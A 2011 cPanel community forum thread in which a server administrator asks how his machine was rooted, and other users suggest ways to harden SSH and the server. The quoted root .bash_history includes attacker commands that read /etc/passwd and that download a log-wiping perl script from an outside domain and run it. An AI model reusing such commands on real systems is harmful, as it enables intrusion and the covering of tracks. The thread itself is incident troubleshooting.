The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

How the heck did I get rooted??!??

Discussion in 'Security' started by jandafields, May 26, 2011.

Thread Status:
Not open for further replies.
  1. jandafields

    jandafields Well-Known Member

    Joined:
    May 6, 2004
    Messages:
    426
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    USA
    cPanel Access Level:
    Root Administrator
    My server was rooted, somehow. I pride myself on security, and my root password is well over 10 random numbers and letters.

    But, there they are, in the root .bash_history:

    Code:
    cd /tmp
    pico /usr/local/apache/conf/includes/errordocument.conf
    cat /etc/passwd
    service httpd restart
    service httpd restart
    chmod 000 /home
    chmod 711 /home
    wget gemicikursu.net/templates/ja_praon/log
    perl log
    id
    cat /etc/passwd
    pwd
    
    What they did was to modify errordocuments so that all 403 redirects show a "TeaM HITMAN HaCkEr" page along with the output of what they got with the id command (full root access).

    That "prel log" program is a server-cleaner... it deletes a lot of logs. Fortunately for me, they did not delete that perl program, and it didn't delete the .bash_history very well.

    I'm using centos 5, latest updates, latest kernel, latest apache, latest php.

    I can understand hacking a website and getting user-level access... but HOW do they get root access??? My server is hardened with most of the recommendations, except for disallowing root ssh access on 22... but that requires guessing passwords. My firewall blocks multiple password attempts.

    I have never given my password to anyone other than my datacenter.
     
  2. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    I would highly suggest blocking root SSH access to only the IP addresses you use for your systems. You can do this in WHM > Host Access Control area.

    As for how someone got onto the machine as root user, have you scanned any system you use for trojans? Also, do you change your root password whenever you provide it to your datacenter? I wouldn't let the datacenter have the root password on file. At the most, I would have a sudo user and give them that user for access. The datacenter can always single boot mode a server to get onto it, so there's no reason to provide them with the root password normally.
     
  3. jandafields

    jandafields Well-Known Member

    Joined:
    May 6, 2004
    Messages:
    426
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    USA
    cPanel Access Level:
    Root Administrator
    Yes, I use rkhunter and chkrootkit and the whm trojan scanner. They all come up clean.

    I did not change the password after giving it to the datacenter, but that would be quite an accusation against a large respected datacenter. Anyway, I have changed the password now, of course, and I will change the port as well.
     
  4. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    For trojan scanning, I meant on your systems that you connect to the server in case somehow your local system were compromised.

    As for accusing a large datacenter, I wasn't implicating anything about this being purposeful in any way. They can have security breaches as well. Look at Sony.

    Again, I highly suggest blocking SSH access to only your IP addresses. Changing the port will only minimize the attack, since attackers use port scanners to find the port a service is listening on. They cannot access SSH if all IPs are blocked besides your own.
     
  5. nobodyk

    nobodyk Well-Known Member

    Joined:
    Aug 1, 2010
    Messages:
    90
    Likes Received:
    0
    Trophy Points:
    6
    If you don't have any protection on you shh port, then it's only a matter of time before you get rooted. I setup a test vps a few months ago, then after I was looking for a command that I wanted to use again I notice other commands that I know I never used...turns out the hacker use my vps to brute force other servers. I password was 6 characters long and I was rooted in a day...

    Granted I didn't had any security on it, it was an out-of-the-box setup.

    For my servers I only use password protect ssh keys and disable password authentication. I also have e-mail sent if someone logs in as root. For best security, disable root logins and use key logins for the wheel user, then su to root. Though my way is a lot faster to login and with good security. Remember to have a firewall installed like CSF, though I think cPanel also provides brute protection.
     
  6. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    At a guess, perhaps they got your password and used that to escalate to root. Could have been session sniffing (often unsecure public wifi - ftp and POP both don't encrypt sessions at all), or could have been a keylogging trojan on your PC.
     
  7. arhs

    arhs Well-Known Member

    Joined:
    Jul 4, 2003
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
    Use public keys for SSH authentication.
     
  8. adminlogs

    adminlogs Member

    Joined:
    May 30, 2011
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Hi,

    If you are sure your server is rooted , then its always better to do an OS reload.

    If you are still stay with the current OS , then you need to re audit your security settings .

    From the given root history , its seems that your /tmp is not secured. Vulnerable file is executed from /tmp. Its a major security tweak. You can refer the following url

    /http://adminlogs.info/2011/04/18/tmp-hack/

    Also ssh port change will not make that much effect , because there are lots of port scanners available. But you can do the following
    1) Restrict ssh access from the trusted network/machine
    2) Disable direct root login.

    In my personal opinion , reload os , secure/tweak the new one and copy the data from backup drive.

    Sincerely,
    /http://www.adminlogs.info
     
  9. SoftDux

    SoftDux Well-Known Member

    Joined:
    May 27, 2006
    Messages:
    983
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Johannesburg, South Africa
    cPanel Access Level:
    Root Administrator
    SSH ports on all our servers are in the 50000 > 60000 range and we use brute force protection to lock out an IP address through iptables on 5 incorrect login attempts, with email notification to a few admins. Since doing this a few years ago we've never had any SSH login attempts.

    You could also use port knocking, with maybe 3 / 4 ports to knock-on and then open / enable SSH for further security
     
  10. Curious Too

    Curious Too Well-Known Member

    Joined:
    Aug 31, 2001
    Messages:
    427
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    Are you using CSF Firewall? If so, have you updated to the latest version? There was an exploit in versions older than 5.30 that allowed root privilege escalation.
     
  11. anand

    anand Well-Known Member

    Joined:
    Nov 11, 2002
    Messages:
    1,435
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    DataCenter Provider
    Did you ever find out how this happened ? Just happened for me on one of my remote VM's. Still trying to figure out how this happened. Found the same exact commands and the same page like you did.
     
  12. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    Is this possible? The json-api has a security hole?
    I had some script kiddies hit one of my servers
    When I check the logs I see this:

    Code:
    GET /json-api/cpanel?cpanel_jsonapi_module=NVData&cpanel_jsonapi_func=set&cpanel_jsonapi_apiversion=2&names=icFAA&icFAA=%7B%22addondomain%22%3A2%2C%22analogstats%22%3A4%2C%22anonymousmsg%22%3A1%2C%22apache%22%3A3%2C%22awstats%22%3A14%2C%22chooselog%22%3A1%2C%22emailmx%22%3A1%2C%22emailroute%22%3A1%2C%22errorlogs%22%3A1%2C%22filemanager%22%3A63%2C%22ftpaccounts%22%3A3%2C%22ftpcontrol%22%3A3%2C%22hd%22%3A1%2C%22hdspace%22%3A3%2C%22image-manager%22%3A1%2C%22index%22%3A4%2C%22keys%22%3A2%2C%22latestvisitors%22%3A4%2C%22legacy_filemanager%22%3A2%2C%22manageaccounts%22%3A1%2C%22mysql%22%3A8%2C%22mysql-remoteaccess%22%3A2%2C%22nettools%22%3A4%2C%22networkmonitor%22%3A1%2C%22null%22%3A1%2C%22parkeddomains%22%3A5%2C%22password%22%3A1%2C%22password-protect%22%3A1%2C%22phpMyAdmin%22%3A9%2C%22rawaccesslogs%22%3A1%2C%22redirects%22%3A16%2C%22scripts-library%22%3A1%2C%22simplezoneedit%22%3A3%2C%22subdomains%22%3A4%2C%22submit-support%22%3A2%2C%22updatecontact%22%3A7%2C%22userfiltering%22%3A1%2C%22webalizerlog%22%3A1%2C%22webdav%22%3A4%2C%22webemail%22%3A1%2C%22php%22%3A2%2C%22lookandfeel%22%3A1%2C%22leechprotect%22%3A1%2C%22hotlinkprotect%22%3A1%2C%22ipdeny%22%3A1%2C%22getstart%22%3A1%7D&__nvdata%3A%3Anocache=1 HTTP/1.1" 403 0 "http://musicorb.com:2082/frontend/x3/index.html?post_login=18002099552856" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15"
    Seems they are trying to blow past the security with that call.
    Am I wrong? Anynoe have an idea?
    And if json-api is a security risk can we block all from outside IP's from accessing it!
    I think that would have been a good idea to do as this kiddie used json-api to access multiple sites and tagged them.

    Suggest you check your cpanel logs at --> /usr/local/cpanel/logs/access_log
     
  13. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    The presence of that line in your log only shows that they attempted to get in that way, it doesn't prove that it was successful. You'd need to check logs and other things to look for time stamps lining up with the attempt, at least, to have any idea of whether it even *might* have been the successful attempt.
     
  14. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    Yes your quite right he wasn't able to get in this time - that's because I closed the door on them and was watching what they do.
    I think if you read my post you will see I said they hit many websites by appending links to the index files.
    So it's quite clear they did get in prior to my shutting them out.
    Make no mistake about it this code is from the same IP's that did the damage and what ever they were trying I believe it's worth looking at.

    That code kinda stands out to me as being important since it came from the people that did break in.
     
  15. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    If you believe there is a security issue with the cPanel API in some way, please submit a bug report for this to be investigated. You can go to http://go.cpanel.net/bugs or using the Bugs link at the top of the forum.
     
  16. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    Will do

    My gut tells me it starts with them getting a single password for one account which they get from an FTP app using spyware of some sort.
    It seems they pickup the password on login to a single website via ftp.
    Not sure what the spyware is as I have not with high confidence found it on the PC that is / was infected.
     
  17. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    Vague gut feelings are pretty useless to everyone here. If you know exactly how they got in, and can prove it, that gives cPanel something to fix. You still don't know for sure that they got in via the link you posted - you have absolutely no idea whether it's that specific URL or some other URL. If they are breaking in via a URL, an exact URL is required - it's not just as simple as appending links to index files - it's an exact link that works, or not, and they may have tried many. This is always confused by the fact that this is often done by bots - so even if they've broken in once successfully, they may use many links before and after that don't actually constitute a problem.

    Of course, if cPanel has access to your machine they may be able to find out more by investigating. I'm not meaning to be irritating here, so apologies if I've succeeded at that - it's just that nobody can fix a fault unless the information is very specific, and it does take a little training and knowledge to learn how to be sufficiently specific.

    A common attack vector is grabbing saved FTP password files and sniffing FTP passwords over public WiFi - just letting you know this is an industry-wide problem, not cPanel-specific.
     
  18. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    Well after going through it with a fine tooth comb I found the problem.
    It was not due to Cpanel but I still do not like these API calls being public.
    That code I thought was not normal is in fact normal as I see it during normal use.
    It was not spyware related which explains why I could not find any spyware.
    It wasn't due to conspiracy of any sort. They seem to be popular these days - lol

    It was due to a security problem at a support system not under my control.

    But I believe having public this API system can be a problem.
    If someone builds scripts to automate replacing websites using this API will then you think about it?
    That is not a worse case scenario - worse case is they blast through the security somehow using an API call.
    Can it be done - if it can be done someone will do it.
     
  19. SoftDux

    SoftDux Well-Known Member

    Joined:
    May 27, 2006
    Messages:
    983
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Johannesburg, South Africa
    cPanel Access Level:
    Root Administrator


    If they can "blast through your security" then they could replace websites using FTP, SSH, cPanel UI, any billing script, etc as well. Not just API.
     
  20. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    Do a google search on - json security issues

    The issue I raise is JSON as it's what the API is based on.
    Now I am not saying JSON is bad but it can have new problems which are not yet known.

    When hackers want to do things they like you do not want to do it manually.
    Scripts can automate tasks. And an API can be quite helpful to automate a task such as replacing all websites on a server.

    Why are you giving them the tools to do this????

    To say what you are saying is to me not making sense.

    Vin
     
Loading...
Thread Status:
Not open for further replies.

Share This Page